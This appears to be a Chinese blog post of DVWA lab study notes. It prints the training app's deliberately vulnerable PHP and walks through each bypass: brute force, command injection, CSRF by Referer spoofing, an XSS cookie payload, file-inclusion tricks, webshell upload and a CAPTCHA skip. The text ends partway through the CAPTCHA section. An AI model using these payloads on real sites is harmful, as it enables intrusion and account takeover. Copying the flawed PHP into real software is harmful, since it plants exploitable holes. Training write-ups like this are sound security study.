DVWA学习笔记

已于 2022-02-24 12:37:12 修改
阅读量3.1k 收藏 4
点赞数 3
分类专栏: 靶场 文章标签: php 安全 web安全
于 2022-01-15 02:06:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lee_maple/article/details/122505506
版权

目录

暴力破解(Brute Force)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

命令注入(Command Injection)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

跨站请求伪造(CSRF)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

文件包含(File Inclusion)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

文件上传(File Upload)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

不安全的验证码(Insecure CAPTCHA)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

SQL注入

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

SQL注入(盲注)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

弱会话ID(Weak Session IDs)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

XSS:基于 DOM 的跨站点脚本 (DOM Based Cross Site Scripting)

Low

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

XSS:反射式跨站点脚本 (Reflected Cross Site Scripting)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

XSS:存储的跨站点脚本(Stored Cross Site Scripting)

Low

源码解析:

解决方法:

Medium

源码解析:

解决方法:

High

源码解析:

解决方法:

CSP:内容安全策略绕过(Content Security Policy Bypass)

Low

源码解析:

Medium

源码解析:

解决方法:

High

源码解析:

暴力破解(Brute Force)

Low

源码解析:

<?php
if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ];
    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );
    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

解决方法:

已知用户名,尝试使用burp爆破密码

随意输入一个密码,将其发送至burpsuit intruder[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传在这里插入图片描述

导入一个字典(在实际生产中需要强大的社会工程学字典)进行暴力破解

在这里插入图片描述

一般情况下,不难看出长度不同的即为正确密码
在这里插入图片描述

Medium

源码解析:

<?php
if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );
    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
       //导致爆破速度相比初级变慢的原因
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

相比Low级别的代码,Medium级别主要增加了mysql_real_escape_string函数

这个函数会对字符串中的特殊符号(x00,n,r,,’,",x1a)进行转义,把其中的字符串给过滤掉了,基本上能够抵御sql注入攻击,那低等级时候用到的注入就失效了。

解决方法:

而中级的暴力破解相对来说较慢是因为有个sleep函数,在破解失败后会使程序停止运行两秒。所以我们直接用爆破方法即可,和low级的一样
已知用户名,尝试使用burp爆破密码

随意输入一个密码,将其发送至burpsuit intruder[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传在这里插入图片描述

导入一个字典(在实际生产中需要强大的社会工程学字典)进行暴力破解

在这里插入图片描述

一般情况下,不难看出长度不同的即为正确密码

在这里插入图片描述

High

源码解析:

<?php
if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );
    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken();
?>

Buri suite Recursive Grep+pitchfock

对于有token来防护csrf的,可以使用到这个功能进行爆破,因为每次用户的token都是随机的。

解决方法:

选择攻击模式为pitchfock,并且给要破解的token项带上美元符号
在这里插入图片描述

选择options将线程数设置为1
在这里插入图片描述

Grep-Extract模块进行相应设置,获取相应的token,截取相应token的前后标识,用于下次截取

在这里插入图片描述

Redirections模块设置允许重定向,选择always

在这里插入图片描述

点击payload的时候选择Recursive grep 并且把之前得到的token值粘贴到下方的方框中

开始爆破

在这里插入图片描述

命令注入(Command Injection)

Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一。和RCE不同,命令注入执行的是一个命令,而RCE是执行代码。

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。

Low

源码解析:

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];
    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }
    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>

我们发现服务器只判断操作系统的类型,没有对IP这个参数进行过滤,这就导致了命令注入。

**php_uname(mode)**这个函数会返回运行php的操作系统的相关描述,参数mode可取值”a” (此为默认,包含序列”s n r v m”里的所有模式),”s ”(返回操作系统名称),”n”(返回主机名),” r”(返回版本名称),”v”(返回版本信息), ”m”(返回机器类型)。用逻辑运算符连接系统命令即可。

解决方法:

直接使用命令输入即可

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VfcRVOiF-1645644879753)(C:\Users\Maple\AppData\Roaming\Typora\typora-user-images\image-20220115015251609.png)]

Medium

源码解析:

<?php
if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>

通过观察源码我们可以知道,medium难度相比low难度增加了对’&&‘和’;‘的过滤,但我们依旧可以使用’|’,’-’,’$’,’()'等特殊符号

解决方法:

很多符号依旧可以使用,所以依然是直接使用命令注入即可

在这里插入图片描述

High

源码解析:

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }
    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>

过滤了多种字符,但我们发现过滤管道符时,后边多加了一个空格

解决方法:

管道符后边多加了空格也就是说明管道符可以正常使用

使用管道符的命令进行攻击即可

在这里插入图片描述

跨站请求伪造(CSRF)

CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。

Low

源码解析:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

解决方法:

首先根据显示正常执行密码的操作

在这里插入图片描述

然后发现url的地址有明文传输修改密码的参数

在这里插入图片描述

我们只需要在password_new和password_conf两个参数后面传入要修改的密码,便可以完成攻击。

经过查阅资料,我们可以通过诱导用户点击一个诱导链接就可以修改用户修改的信息,从而达到攻击的目的

Medium

源码解析:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Feedback for the user
            echo "<pre>Password Changed.</pre>";
        }
        else {
            // Issue with passwords matching
            echo "<pre>Passwords did not match.</pre>";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "<pre>That request didn't look correct.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Middle在Low的基础上,加上了对用户请求头的中的Referer字段进行验证

 if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

即用户的请求头中的Referer字段必须包含了服务器的名字。当我们再打开另一个页面,在顶部URL中自己输入时,

它会报错,提示你Http Referer字段没有定义索引(如下图)

在这里插入图片描述

解决方法:

我们打开另一个页面,在顶部URL中输入链接,用burpsuite进行抓包

在这里插入图片描述

可以看到直接打开页面输入URL的时候,请求包的头中没有Referer字段,所以不能修改成功

我们可以自己加一个Referer字段,值只要设置成包含了主机头127.0.0.1即可

在这里插入图片描述

High

源码解析:

<?php
$change = false;
$request_type = "html";
$return_message = "Request Failed";

if ($_SERVER['CONTENT_TYPE'] == "application/json") {
    $data = json_decode(file_get_contents('php://input'), true);
    $request_type = "json";
    if (array_key_exists("HTTP_USER_TOKEN", $_SERVER) &&
        array_key_exists("password_new", $data) &&
        array_key_exists("password_conf", $data) &&
        array_key_exists("Change", $data)) {
        $token = $_SERVER['HTTP_USER_TOKEN'];
        $pass_new = $data["password_new"];
        $pass_conf = $data["password_conf"];
        $change = true;
    }
} else {
    if (array_key_exists("user_token", $_REQUEST) &&
        array_key_exists("password_new", $_REQUEST) &&
        array_key_exists("password_conf", $_REQUEST) &&
        array_key_exists("Change", $_REQUEST)) {
        $token = $_REQUEST["user_token"];
        $pass_new = $_REQUEST["password_new"];
        $pass_conf = $_REQUEST["password_conf"];
        $change = true;
    }
}
if ($change) {
    // Check Anti-CSRF token
    checkToken( $token, $_SESSION[ 'session_token' ], 'index.php' );

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = mysqli_real_escape_string ($GLOBALS["___mysqli_ston"], $pass_new);
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '" . $pass_new . "' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert );

        // Feedback for the user
        $return_message = "Password Changed.";
    }
    else {
        // Issue with passwords matching
        $return_message = "Passwords did not match.";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);

    if ($request_type == "json") {
        generateSessionToken();
        header ("Content-Type: application/json");
        print json_encode (array("Message" =>$return_message));
        exit;
    } else {
        echo "<pre>" . $return_message . "</pre>";
    }
}
// Generate Anti-CSRF token
generateSessionToken();
?>

High的代码增加了Anti-CSRF token机制,就是说用户每次访问改密页面时,服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端请求。

解决方法:

在这里插入图片描述

想要将密码提交就必须获取这个随机的token,我找了挺多资料的,最多也是最快捷省事使用的方法就是在其他界面(指XSS注入)中利用js获取token然后提交

<script>alert(document.cookie)</script>

在这里插入图片描述

在这里插入图片描述

文件包含(File Inclusion)

Low

源码解析:

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>

解决方法:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hkOwBGdG-1645644879755)(C:\Users\Maple\AppData\Roaming\Typora\typora-user-images\image-20220128195611100.png)]

分别浏览三个文件,发现了该页面所在的绝对路径

在这里插入图片描述

这个漏洞有两种解决方案

第一种:本地包含

遍历目录文件,使用相对路径获取即可
在这里插入图片描述

第二种:远程包含

可以使用在kali上搭建的web服务器,创建info.txt,内容为:

<?php phpinfo(); ?>

img

(第二种没有实操,图片来自CSDN博主「BROTHERYY」)

Medium

源码解析:

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

?>

可以看到,代码使用 str_replace函数 对http:// 和 https://进行了过滤,防止了远程包含漏洞的产生,也过滤了 …/ 和 …\ 防止了进行目录切换的包含。

解决方法:

但是使用 str_replace 函数进行过滤是很不安全的,因为可以使用双写绕过。例如,我们包含 hthttp://tp://xx 时,str_replace 函数只会过滤一个,所以最终还是会包含到

我们先payload?page=http://127.0.0.1/phpinfo.php

在这里插入图片描述

代码使用 str_replace函数 对http:// 和 https://进行了过滤,防止了远程包含漏洞的产生所以,我们可以试试payload?page=htthttp://p://127.0.0.1/phpinfo.php
在这里插入图片描述

看到有回显,可以了

High

源码解析:

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>

从代码中可以看出禁止了除file开头和include.php以外的文件

解决方法:

这样过滤看似安全,不幸的是我们可以利用file协议绕过防护策略。file协议我们并不陌生,当我们用浏览器打开一个本地文件时,用的就是file协议,构造如下URL

file协议

File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。要使用File协议,基本的格式如下:file:///文件路径

如此一来我们就可以利用file协议上传存在我们电脑中写好的木马了

payload:?page=file:///D:\NetSafesoftware\phpstudy_pro\WWW\DVWA-master\php.ini

在这里插入图片描述

文件上传(File Upload)

Low

源码解析:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

解决方法:

我们先查看源码,通过源码可以知道服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。

所以我们可以直接上传一句话木马之类的从而连接对方服务器

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QGzDdu5i-1645644879756)(C:\Users\Maple\AppData\Roaming\Typora\typora-user-images\image-20220128224533408.png)]

Medium

源码解析:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

Medium级别做了限制,要求文件类型必须是jpeg或者png,如果直接上传,会提示如下Your image was not uploaded. We can only accept JPEG or PNG images.,必须是jpg和png

解决方法:

所以抓包进行修改文件类型即可

所以我们创建一个.jpg的文件,使用burp进行修改文件类型

在这里插入图片描述

对burp抓的包进行更改

在这里插入图片描述

上传成功后连接中国菜刀或者中国蚁剑即可

High

源码解析:

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {
        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>

依旧是对文件类型的检查

解决方法:

(还是上传图片马,用Medium的方法也可以,但是这个方法不用抓包更快捷方便)

将图片直接修改成一句话木马(利用Dos命令:Copy 1.jpg/b + 2.php/a 3.jpg)

直接上传3.jpg即可

在这里插入图片描述

不安全的验证码(Insecure CAPTCHA)

Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称。

Low

源码解析:

<?php
if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check CAPTCHA from 3rd party
    $resp = recaptcha_check_answer(
        $_DVWA[ 'recaptcha_private_key'],
        $_POST['g-recaptcha-response']
    );

    // Did the CAPTCHA fail?
    if( !$resp ) {
        // What happens when the CAPTCHA was entered incorrectly
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;
    }
    else {
        // CAPTCHA was correct. Do both new passwords match?
        if( $pass_new == $pass_conf ) {
            // Show next stage for the user
            echo "
                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
                <form action=\"#\" method=\"POST\">
                    <input type=\"hidden\" name=\"step\" value=\"2\" />
                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                    <input type=\"submit\" name=\"Change\" value=\"Change\" />
                </form>";
        }
        else {
            // Both new passwords do not match.
            $html     .= "<pre>Both passwords must match.</pre>";
            $hide_form = false;
        }
    }
}

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check to see if both password match
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the end user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with the passwords matching
        echo "<pre>Passwords did not match.</pre>";
        $hide_form = false;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

通过查看源码,可以发现这个过程分为两个阶段,其中第一阶段是为了验证用户身份,服务器会用私钥对用户进行身份验证,如果验证成功了才能进行修改密码

第二阶段判断如果两次输入的密码一致,就进行修改

解决方法:

那么如果能绕过第一阶段,则只需要两次密码输入一致就能修改了

在这里插入图片描述

抓包,将step修改为2即可绕过第一阶段进行密码修改
在这里插入图片描述

Medium

源码解析:

<?php
if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check CAPTCHA from 3rd party
    $resp = recaptcha_check_answer(
        $_DVWA[ 'recaptcha_private_key'],
        $_POST['g-recaptcha-response']
    );

    // Did the CAPTCHA fail?
    if( !$resp ) {
        // What happens when the CAPTCHA was entered incorrectly
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
        $hide_form = false;
        return;
    }
    else {
        // CAPTCHA was correct. Do both new passwords match?
        if( $pass_new == $pass_conf ) {
            // Show next stage for the user
            echo "
                <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
                <form action=\"#\" method=\"POST\">
                    <input type=\"hidden\" name=\"step\" value=\"2\" />
                    <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                    <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                    <input type=\"submit\" name=\"Change\" value=\"Change\" />
                </form>";
        }
        else {
            // Both new passwords do not match.
            $html     .= "<pre>Both passwords must match.</pre>";
            $hide_form = false;
        }
    }
}

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
    // Hide the CAPTCHA form
    $hide_form = true;

    // Get input
    $pass_new  = $_POST[ 'password_new' ];
    $pass_conf = $_POST[ 'password_conf' ];

    // Check to see if both password match
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the end user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with the passwords matching
        echo "<pre>Passwords did not match.</pre>";
        $hide_form = false;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

与Low相比,增加了第一阶段的判断,设置一个标志位passed_capt,如果身份验证通过了,就设置为true

解决方法:

输入和确定密码,进行抓包,发现没有新增的标志位参数

在这里插入图片描述

那就主动添加一个参数passed_captcha

step=2&password_new=password&password_conf=password&Change=Change&passed_captcha=true

在这里插入图片描述

在这里插入图片描述

依然可以使用老方法诱导用户进入危险站点

High

源码解析:

